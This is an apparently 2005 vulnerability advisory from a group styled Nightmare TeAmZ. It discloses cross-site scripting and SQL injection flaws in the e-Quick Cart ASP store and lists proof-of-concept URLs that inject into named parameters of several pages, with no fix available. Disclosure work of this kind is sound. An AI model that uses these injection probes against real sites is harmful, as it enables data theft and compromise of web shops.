------------------------------------------------------ Nightmare TeAmZ Advisory 016 ------------------------------------------------------ Date - 11/2005 e-Quick Cart Sql & Xss AFFECTED PRODUCTS ================= e-Quick Cart http://www.cdmweb.com Xss Poof: ======== www.[host].com/[path]/shopgift.asp?strgifttoname="> www.[host].com/[path]/shopmaillist.asp?strfirstname="> www.[host].com/[path]/shopprojectlogin.asp?strpid="> www.[host].com/[path]/shoptellafriend.asp?Custname="> Sql Poof: ======== www.[host].com/[path]/shopaddtocart.asp?quantity=1&Order=Order&productid=' www.[host].com/[path]/shopprojectlogin.asp?strpid=1&strpemail=' www.[host].com/[path]/shoptellafriend.asp??id=' Solution: ========= No Solution At This Time Credits ======= This vulnerability was discovered and researched by BiPi_HaCk of Nightmare TeAmZ We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0 Site: http://www.NightmareSecurity.net <--IT Security Forum _________________________________________________________________ Comunica in tempo reale http://messenger.msn.com/beta